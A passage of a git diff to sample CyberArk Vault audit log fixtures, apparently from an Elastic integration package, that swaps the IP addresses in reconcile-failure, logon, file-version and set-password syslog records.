Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=67.43.156.15;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=67.43.156.15;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log index 0d2f4d0e96e..4fefbe43db6 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/62_create_file_version.log @@ -1,8 +1,8 @@ -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-11T16:50:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:29\n 2021-03-11T16:50:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PVWAAppUser\n Create File Version\n \n \n PSMSessions\n Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\n 10.0.1.20\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:29","IsoTimestamp":"2021-03-11T16:50:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PVWAAppUser","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-14T12:07:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:32\n 2021-03-14T12:07:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PasswordManager\n Create File Version\n \n \n AccountsFeedDiscoveryLogs\n Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\n 10.0.1.20\n \n \n \n \n \n Create File Version\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:32","IsoTimestamp":"2021-03-14T12:07:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PasswordManager","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"AccountsFeedDiscoveryLogs","File":"Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log index 82be0d698c1..642ca7704b6 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/7_logon.log @@ -5,8 +5,8 @@ <5>1 2021-03-04T19:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 04 11:11:23","IsoTimestamp":"2021-03-04T19:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-05T10:18:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 05 02:18:50","IsoTimestamp":"2021-03-05T10:18:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log index 308e66ee8c0..0c85cdc8b95 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/88_set_password.log @@ -3,16 +3,16 @@ Mar 08 02:54:46 VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PVWAGWUser","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:19","IsoTimestamp":"2021-03-10T08:29:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:28Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:28","IsoTimestamp":"2021-03-10T08:29:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PasswordManager","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set 